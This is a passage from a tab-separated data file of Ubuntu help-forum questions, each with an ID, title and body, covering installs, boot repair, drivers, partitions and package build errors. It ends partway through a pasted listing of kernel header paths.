473477	import error packages with python installed on ubuntu 12.04	i installed python-3.1.3 on ubuntu 12.04 server edition following this method . after that , i run a simple program calling to paramiko module . i got several errors related to package imports . the following screenshot shows them : i ask this question because i am sure i will get similar import packages error with future program . so as to use python-3.1.3 , inside the script , i put this line # ! /usr/bin/python3.1.3 how can i resolve this problem ?
473478	gparted has a little key icon on my ubuntu partition so i can not resize it	how can i make separate partition ( to install windows 7 ) using ubuntu . i tried to use gparted but there is a little key icon on my ubuntu partition therefore i cant make a new partition .
473479	how to allow the following features to guest in ubuntu 14.04 ?	i use a ubuntu 14.04 pc . it has an admin and guest accounts . i am the admin of my pc and my sisters use the guest account . they complained that they are unable to do some things in the guest account . i will tell it - they are unable to access the 'volumes ' . is there any way to make them access the 'volumes ' ? also the history is removed in firefox in the guest account after a system restart . is it possible to keep the history forever ?
473482	adobe flash not working in firefox but in chrome	after installing flash using terminal and manually.flash is not working in firefox but is working correctly in chrome .
473486	java plugin stoped working on chrome	ubuntu 12.04 here . my java-6-openjdk-amd64 java plugin was fine until i installed the last week-or-two system updates . now when i verify java google chrome gives me the install plugin yellow bar.. i 've tried : installing icedtea-7-plugin as suggested by this answer and it did n't work . making the symlink as suggested on the java website and mixing both by : cd /opt/google/chrome/plugins/ sudo ln -s /usr/lib/jvm/java-7-openjdk-amd64/jre/lib/amd64/icedteaplugin.so always closing and restating chrome.. nothing works.. any idea ?
473487	it is normal ubuntu installation remain in `` detecting file systems '' long ?	it is normal for ubuntu installation to remain at the `` detecting file systems '' stage for long ? i followed all the steps as recommended , i have created the partition `` / '' and `` home '' , i am now waiting on the installation window while i get the message `` detecting file systems '' . it 's been about two hours . installing ubuntu 14 from a dvd .
473490	problems installing ubuntu alongside windows 7 on lenovo g780	i am trying to install ubuntu 14.04 alongside windows 7 on a lenovo g780 laptop . i successfully downloaded ubuntu onto a usb stick and can boot from the usb , but when i try and install it i get this message which says that `` this computer has no currently detected operating systems '' . i 've tried several times and have always got this same message , although once it also told me there was a problem with /dev/sda . how can i get a dual boot system with windows 7 and ubuntu 14.04 to work ? thanks . neither this workaround nor this one worked for me .
473496	linux-3.14.4 kernel install problem in ubuntu 14.04	i am trying to install the latest kernel 3.14.4 on my ubuntu 14.04 . but it gives me an error when i try to install using make file . i have also done the make oldconfig , it took more than 3 hours to complete , and when i try to make install , a few errors are thrown in the terminal : virtualbox : /home/sonyx64/documents/linux-3.14.4 # make install sh /home/sonyx64/documents/linux-3.14.4/arch/x86/boot/install.sh 3.14.4 arch/x86/boot/bzimage \ system.map `` /boot '' run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.14.4 /boot/vmlinuz-3.14.4 run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.14.4 /boot/vmlinuz-3.14.4 update-initramfs : generating /boot/initrd.img-3.14.4 warning : missing /lib/modules/3.14.4 device driver support needs thus be built-in linux image ! depmod : error : could not open directory /lib/modules/3.14.4 : no such file or directory depmod : fatal : could not search modules : no such file or directory depmod : warning : could not open /tmp/mkinitramfs_xm5cty/lib/modules/3.14.4/modules.order : no such file or directory depmod : warning : could not open /tmp/mkinitramfs_xm5cty/lib/modules/3.14.4/modules.builtin : no such file or directory run-parts : executing /etc/kernel/postinst.d/pm-utils 3.14.4 /boot/vmlinuz-3.14.4 run-parts : executing /etc/kernel/postinst.d/update-notifier 3.14.4 /boot/vmlinuz-3.14.4 run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.14.4 /boot/vmlinuz-3.14.4 generating grub configuration file ... warning : setting grub_timeout to a non-zero value when grub_hidden_timeout is set is no longer supported . found linux image : /boot/vmlinuz-3.15.0-1-generic found initrd image : /boot/initrd.img-3.15.0-1-generic found linux image : /boot/vmlinuz-3.14.4 found initrd image : /boot/initrd.img-3.14.4 found linux image : /boot/vmlinuz-3.14.4.old found initrd image : /boot/initrd.img-3.14.4 found memtest86+ image : /boot/memtest86+.elf found memtest86+ image : /boot/memtest86+.bin done
473497	set up trendnet tew-638apb access point on ubuntu 14.04	i have a computer running ubuntu 14.04 , it has 2 ethernet ports . i would like to set up this computer so that the internet comes in on one of the ports and is then shared through the other port with the trendnet wireless access point that my other devices would connect to and use the internet . i have looked online for information on setting this up but have not been able to find anything . if someone could point me to a guide that would help me or just tell me how to do this in an answer i would really appreciate it . please help me to solve this problem
473500	first mouse click not detected	since a few days my mouse reacts different on a click . the first click is not working properly , it seems as it is interpreted as a hoover , the second click is interpreted as the first 'real ' click . i tried switching left and right buttons , but behaviour stays the same . tried restarting unity , implemented ctrl_alt_bksp , but did n't help either . i am running 14.04 ubuntu , and have all packages up-to-date using apt-get update/upgrade . $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ imps/2 generic wheel mouse id=9 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=8 [ slave keyboard ( 3 ) ] $ universal settings - pointing and clicking - all three are off is there anybody with a clue ? thanks in advance ! patrick
473503	how to check if my installation of ubuntu is alright ?	i recently changed the size of the partition that contained my ubuntu installation using gparted from a live cd . i also moved it from one place to another . it was my first time and i hit the cancel button during my first try . i completed the task in my second try . but now i see that the size of the `` computer '' folder has shrunk by 2gb . now i want to know if the system files are all right as i have backed up my files from the home folder before . how do i do that ? some information : related errors found in /var/log/syslog ( ae_error ) ; disabling aspm [ 12.287674 ] ext4-fs ( sda3 ) : re-mounted . opts : errors=remount-ro [ 40.663974 ] quiet_error : 150 callbacks suppressed [ 40.663979 ] buffer i/o error on device sdb , logical block 1 [ 40.663984 ] buffer i/o error on device sdb , logical block 1 [ 40.663991 ] buffer i/o error on device sdb , logical block 1 [ 40.664026 ] buffer i/o error on device sdb , logical block 0 [ 40.664032 ] buffer i/o error on device sdb , logical block 0 [ 40.664038 ] buffer i/o error on device sdb , logical block 0 [ 40.664044 ] buffer i/o error on device sdb , logical block 0 [ 40.664050 ] buffer i/o error on device sdb , logical block 0 [ 40.664056 ] buffer i/o error on device sdb , logical block 0 [ 40.664062 ] buffer i/o error on device sdb , logical block 0 [ 1401354046.120788 ] [ nm-dns-dnsmasq.c:396 ] update ( ) : dnsmasq owner not found on bus : could not get owner of name 'org.freedesktop.networkmanager.dnsmasq ' : no such name contents of etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda3 during installation # uuid=9bf1abba-55b4-466f-8f63-f0c2a94534b2 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda1 during installation uuid=5110-fe96 /boot/efi vfat defaults 0 1 # swap was on /dev/sda2 during installation uuid=f16a051b-9c39-4d67-9bbc-48ba711004ed none swap sw 0 0 output of 'mount ' command /dev/sda3 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /sys/firmware/efi/efivars type efivarfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) /dev/sda1 on /boot/efi type vfat ( rw ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=likhon )
473504	ubuntu 14.04 notification incorrectly displayed	i have a problem with my notifications on ubuntu 14.04 x64 . the notifications are just plain text with a colored background , and are also strangely placed in the top left corner . i have no idea on how it changed . after one reboot it was just there.. here is a picture of the problem in question . : as you can see the notification appear over the unified menu . how can i restore the original state of the notification bubble ? here are the settings in ~/.notify-osd slot-allocation = fixed bubble-expire-timeout = 10sec bubble-vertical-gap = 5px bubble-horizontal-gap = 5px bubble-corner-radius = 37,5 % bubble-icon-size = 30px bubble-gauge-size = 6px bubble-width = 240px bubble-background-color = 131313 bubble-background-opacity = 90 % text-margin-size = 10px text-title-size = 100 % text-title-weight = bold text-title-color = ffffff text-title-opacity = 100 % text-body-size = 90 % text-body-weight = normal text-body-color = eaeaea text-body-opacity = 100 % text-shadow-opacity = 100 % if i check the org.freedesktop.notifications.service ( /usr/share/dbus-1/servies ) it appears to use the correct one . [ d-bus service ] name=org.freedesktop.notifications exec=/usr/lib/x86_64-linux-gnu/notify-osd
473507	what is proper way to get specific version of package	i am using ubuntu 14.04 lts i need to use curl package . but it comes in version 7.35.0 with known ssl bug ( already fixed in next version ) i either need lower version < = 7.33.0 or higher > = 7.36.0 to make it works , but how can i do it ? do i need to manually install curl ? i checked synaptics , `` force version '' feature is greyed out . i also checked apt-cache showpkg curl , there is no other version available . i also tried to add `` proposed '' repositories , no new curl version either . what should i do ? i am thinking about getting .deb package from previous ubuntu release ...
473509	disk drive errors during startup - what do they mean ?	i get some of this error during startup : [ 6.453064 ] ata2.00 : failed command : read fpdma queued [ 6.453083 ] ata2.00 : cmd 60/08:00:80:5f:77/00:00:72:00:00/40 tag 0 ncq 4096 in [ 6.453083 ] res 40/00:0c:90 : fb:6a/00:00:00:00:00/40 emask 0x10 ( ata bus error ) [ 6.453127 ] ata2.00 : status : { drdy } after that it says : errors were found while checking the disk drive for /home/ and i can choose between skip , ignore and manual mounting . if i choose to ignore the errors , it boots and works perfectly and as i see fast . smart data & self-test about the hdd : i do n't really know much about that , so does the ata cable make the errors or the hdd ? do you think it will slow down my system ? at least , can i ignore it automatically ? thanks , adamkrisz
473510	change password prompt	i am asking the very same question in this link : remember ubuntu password but ask for sudo confirmation it has been left unanswered . i want to modify the password prompt to become a single click ... it is very inconvenient to have to type a long password frequently..and using a short one like a single character is faster but insecure particularly because i rely on it for encryption . possible good solutions 1 ) have the password already filled everytime after login , you only hit enter 2 ) prompt to click ok or cancel ... like debian . but solutions compromising security are not acceptable.. such as always sudo or running as root .
473515	transfer all messages of thunderbird with windows 7 to thunderbird ubuntu 14.04 ?	how can i transfer all messages and contacts of thunderbird with windows 7 to thunderbird ubuntu 14.04 ? i know that have a free app called mozbackup . but it do n't works with linux . there a way that can i make this moving ? thanks !
473518	can someone help me remove/fix ubuntu ?	i 'm very new to ubuntu for starters . whenever i turn my computer on , it opens to the gnu grub terminal . it says it supports minimal bash-like line editing ( i have no idea what this means ) . to work-around this , i used `` exit -ubuntu '' , this then takes me to a separate page which i selected the windows boot manager and click on the windows 8.1 icon which makes my windows 8 load normally . if i click on the other icon , being the ubuntu one , i get put back at the gnu grub terminal and thats it . if someone could help me either remove ubuntu or repair it so that i can load it again , i would appreciate it . i had installed the most recent ubuntu version .
473519	chromium and google chrome downloading	well , i have sincerely enjoyed having google chrome on my linux machine , and have never had any problems until recently . i found that google chrome will simply not allow redirected downloads to start . i can download from direct links , but not pages that redirect and `` start in 3 seconds ... '' i immediately assumed it was the webpage itself , so i refreshed many times . i then restarted the browser , and after another failed attempt , my computer . after that point , i suspected my internet provider was to blame . i tried the redirection link in an alternative browser ( midori ) , and it worked perfectly fine . i decided it must be the version of chrome that google put out , so i quickly installed chromium , and to my dismay , ran across the same problem . i can live with copying and pasting the url into midori for redirected links , but i 'd like the convenience of staying in my main browser . thank you for any advice in advance . c :
473523	installing wmic on ubuntu server 12.04 lts	has anyone had any luck installing wmic ( wmi client ) under ubuntu server 14.04 lts ? i tried following the document http : //techedemic.com/2012/11/05/installing-wmic-in-ubuntu-12-04-lts-64-bit-desktop/ however i still ca n't get a successful make . has anyone had any luck getting a compiled version of wmic onto ubuntu , i need this for nagios check_wmi_plus , but it always errors , details below . i 'm not sure if the support information is telling me to install those modules or not ( sorry if being dumb , new to ubuntu from opensuse ) . many thanks in advance . summary : support for gtk+ frontends : no ( install gtk , gconf ) support for ssl in swat and ldap : no ( install gnutls ) support for threads in smbd ( see -- with-pthread ) : no ( install pthread ) support for intelligent command line editing : no ( install readline ) support for changing process titles ( see -- with-setproctitle ) : no ( install setproctitle ) support for using extended attributes : yes support for using libblkid : no ( install blkid ) support for using iconv : yes support for using pam : no ( install pam ) using external popt : no developer mode : no automatic dependencies : no ( install gnu make > = 3.81 and see -- enable-automatic-dependencies ) building shared libraries : yes using shared libraries internally : no ( specify -- enable-dso ) make [ 1 ] : entering directory `/tmp/wmi-1.3.14/samba/source' creating lib/util/util_proto.h creating lib/charset/charset_proto.h creating param/proto.h creating libcli/util/proto.h defined ( @ array ) is deprecated at ./pidl/pidl line 583 . ( maybe you should just omit the defined ( ) ? ) compiling ./librpc/idl/atsvc.idl /usr/include/stdc-predef.h:0 : syntax error near '3' failed to parse ./librpc/idl/atsvc.idl at ./pidl/pidl line 583. make [ 1 ] : *** [ idl ] error 1 make [ 1 ] : leaving directory `/tmp/wmi-1.3.14/samba/source' cd samba/source ; \ cp bin/winexe ../../bin ; \ cp bin/wmic ../../bin ; \ cp bin/shared/*async_wmi_lib.so.0* ../../lib/python cp : can not stat ‘bin/winexe’ : no such file or directory cp : can not stat ‘bin/wmic’ : no such file or directory cp : can not stat ‘bin/shared/*async_wmi_lib.so.0*’ : no such file or directory make : *** [ pywmi-installed ] error 1
473527	trouble booting windows 8 and now ubuntu 14.04	my laptop came with windows 8 preinstalled . i created a live usb and used that for week before installing ubuntu alongside windows . after installing , windows 8 will not boot , error message when attempting to boot in grub . 'the boot configuration data for your pc is missing or contains errors . ' so i installed boot-repair and followed instructions there . i believe boot repair removed grub and attempted to install grub 2 . now when i try to boot , error message is file '/boot/grub/i386-pm normal.mod ' not found . entering rescue mode ... grub rescue > when i insert the live usb and restart , no difference ( not recognized or something ) . how can i fix all these problems ? need help ! i need help to run the live usb and then install a boot program that boots both windows and ubuntu . i saved some text info on my flash drive , but i ca n't post it here without access another computer . if needed i can take a trip to the library . thanks all !
473529	seperate nemo bookmarks from sidebar	is it possible to separate nemo bookmarks from nemo sidebar just like nautilus sidebar ? . nemo always display place and bookmarks together . i need to separate bookmarks form places . thanks
473530	enlarge ( re-size ) /boot using xubuntu 13.10 , preparing to install 14.04	the installer remarks insufficient space in /boot . i 've to enlarge it . unfortunately i do n't know how . please give me a hind . thanks .
473531	gromacs configuration in ubuntu	i installed gromacs 4.6.5 in kubuntu 14.04.. after installation if everything went right , by writing luck into terminal we should get a quote , according to this link : but i get error like luckcommand not found . the solution according to the link above is adding a line to the login file . i quote the solution here : if this , in contrast , returns the phrase luck : command not found . then you have to verify where your version of gromacs is installed . in the default case , the binaries are located in '/usr/local/gromacs/bin ' , however , you can ask your local system administrator for more information . if we assume that gromacs is installed in directory xxx you would find the executables ( programs ) in xxx/bin . to be able to access the programs without problems , you will have to edit the login file for your shell . if you use the c shell , this file is called .cshrc or .tcshrc , and it is located in your home directory . add a line like : the problem is that i can not find anything with .cshrc or .tcshrc i nthe home folder . i enabled to see hidden files too .
473534	ubuntu upgrade to 14.04 lts	if i upgrade my ubuntu 13.10 to ubuntu 14.04 lts will all of my previous upgrades remain or not ?
473535	incorrect flash drive size	my 32gb corsair voyager gt flash drive is only showing 100mb total space after formatting . how do i correct this issue and get all 32gbs back ?
473539	best ubuntu release for amd athlon 64 + 3000 1.8 ghz ?	what is the best ubuntu release for this hardware : amd athlon 64 3000+ 1.8 ghz 3 gb ram ati radeon x1050 256mb because with ubuntu 14.04 it crashes .
473541	deactivate middle mouse for one ( kde ) application	i really like the middle mouse paste function . makes life easy . but ... once in a while i have a very important document , or code , which i can not mess up . thus , i would like to disable the middle mouse paste for a single application . in my case it would be kile . i have had a close look to the solutions proposed , but they all disable it for everything . or they completely disable the middle mouse button . how would i disable the paste function for one program ?
473543	build-essentials installation failing	i am having trouble accessing the several critical header files that show to be a part of the build process . the `` ubuntu software center '' shows `` build essentials '' as installed : next i did the following two commands , which did not improve the problem : ~ $ sudo apt-get install build-essential [ sudo ] password for : reading package lists ... done building dependency tree reading state information ... done build-essential is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . : ~ $ dump of headers after installation attempts . > /usr/include/boost/interprocess/detail/atomic.hpp > /usr/include/boost/interprocess/smart_ptr/detail/sp_counted_base_atomic.hpp > /usr/include/qt4/qt/qatomic.h /usr/include/qt4/qt/qbasicatomic.h > /usr/include/qt4/qtcore/qatomic.h > /usr/include/qt4/qtcore/qbasicatomic.h > /usr/share/doc/git-annex/html/bugs/git_annex_unlock_is_not_atomic.html > /usr/src/linux-headers-3.11.0-15/arch/alpha/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/arc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/arm/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/arm64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/avr32/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/blackfin/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/cris/include/arch-v10/arch/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/cris/include/arch-v32/arch/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/cris/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/frv/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/h8300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/hexagon/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/ia64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/m32r/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/m68k/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/metag/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/microblaze/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/mips/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/mn10300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/parisc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/powerpc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/s390/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/score/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/sh/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/sparc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/tile/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/x86/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/arch/xtensa/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-15/include/asm-generic/atomic.h > /usr/src/linux-headers-3.11.0-15/include/asm-generic/bitops/atomic.h > /usr/src/linux-headers-3.11.0-15/include/asm-generic/bitops/ext2-atomic.h > /usr/src/linux-headers-3.11.0-15/include/asm-generic/bitops/non-atomic.h > /usr/src/linux-headers-3.11.0-15/include/linux/atomic.h > /usr/src/linux-headers-3.11.0-15-generic/include/linux/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/alpha/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/arc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/arm/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/arm64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/avr32/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/blackfin/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/cris/include/arch-v10/arch/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/cris/include/arch-v32/arch/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/cris/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/frv/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/h8300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/hexagon/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/ia64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/m32r/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/m68k/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/metag/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/microblaze/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/mips/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/mn10300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/parisc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/powerpc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/s390/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/score/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/sh/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/sparc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/tile/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/x86/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/arch/xtensa/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-17/include/asm-generic/atomic.h > /usr/src/linux-headers-3.11.0-17/include/asm-generic/bitops/atomic.h > /usr/src/linux-headers-3.11.0-17/include/asm-generic/bitops/ext2-atomic.h > /usr/src/linux-headers-3.11.0-17/include/asm-generic/bitops/non-atomic.h > /usr/src/linux-headers-3.11.0-17/include/linux/atomic.h > /usr/src/linux-headers-3.11.0-17-generic/include/linux/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/alpha/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/arc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/arm/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/arm64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/avr32/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/blackfin/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/cris/include/arch-v10/arch/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/cris/include/arch-v32/arch/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/cris/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/frv/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/h8300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/hexagon/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/ia64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/m32r/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/m68k/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/metag/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/microblaze/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/mips/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/mn10300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/parisc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/powerpc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/s390/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/score/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/sh/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/sparc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/tile/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/x86/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/arch/xtensa/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-18/include/asm-generic/atomic.h > /usr/src/linux-headers-3.11.0-18/include/asm-generic/bitops/atomic.h > /usr/src/linux-headers-3.11.0-18/include/asm-generic/bitops/ext2-atomic.h > /usr/src/linux-headers-3.11.0-18/include/asm-generic/bitops/non-atomic.h > /usr/src/linux-headers-3.11.0-18/include/linux/atomic.h > /usr/src/linux-headers-3.11.0-18-generic/include/linux/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/alpha/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/arc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/arm/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/arm64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/avr32/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/blackfin/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/cris/include/arch-v10/arch/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/cris/include/arch-v32/arch/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/cris/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/frv/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/h8300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/hexagon/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/ia64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/m32r/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/m68k/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/metag/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/microblaze/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/mips/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/mn10300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/parisc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/powerpc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/s390/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/score/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/sh/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/sparc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/tile/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/x86/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/arch/xtensa/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-19/include/asm-generic/atomic.h > /usr/src/linux-headers-3.11.0-19/include/asm-generic/bitops/atomic.h > /usr/src/linux-headers-3.11.0-19/include/asm-generic/bitops/ext2-atomic.h > /usr/src/linux-headers-3.11.0-19/include/asm-generic/bitops/non-atomic.h > /usr/src/linux-headers-3.11.0-19/include/linux/atomic.h > /usr/src/linux-headers-3.11.0-19-generic/include/linux/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/alpha/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/arc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/arm/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/arm64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/avr32/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/blackfin/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/cris/include/arch-v10/arch/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/cris/include/arch-v32/arch/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/cris/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/frv/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/h8300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/hexagon/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/ia64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/m32r/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/m68k/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/metag/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/microblaze/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/mips/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/mn10300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/parisc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/powerpc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/s390/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/score/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/sh/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/sparc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/tile/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/x86/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/arch/xtensa/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-20/include/asm-generic/atomic.h > 